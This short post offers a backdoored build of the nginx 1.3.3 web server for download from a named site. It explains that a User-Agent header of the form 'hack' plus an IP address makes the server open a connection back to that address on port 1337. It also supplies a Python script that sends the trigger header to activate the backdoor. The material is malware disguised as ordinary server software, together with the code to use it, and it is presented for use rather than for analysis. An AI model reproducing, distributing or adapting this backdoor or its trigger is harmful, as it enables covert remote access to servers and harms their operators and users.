A Simple Backdoored Version of nginx-1.3.3

Here a simple backdoored version of nginx-1.3.3 that worked based on browser's user agent. Whenever it receives a http user agent string : "hackip_address" it will send a
back connect to specified ip address on port 1337.
http://www.cr0security.com/backdoored/nginx-1.3.3-malicious.tgz

example of usage we may use this simple python code:

=========
#!/usr/bin/python
import urllib2
opener = urllib2.build_opener()
opener.addheaders = [('User-agent', 'hack127.0.0.1')]
response = opener.open('http://localhost')
=========

change 127.0.0.1 suits to ip address and change the localhost string to server's host that already installed the backdoored version of nginx.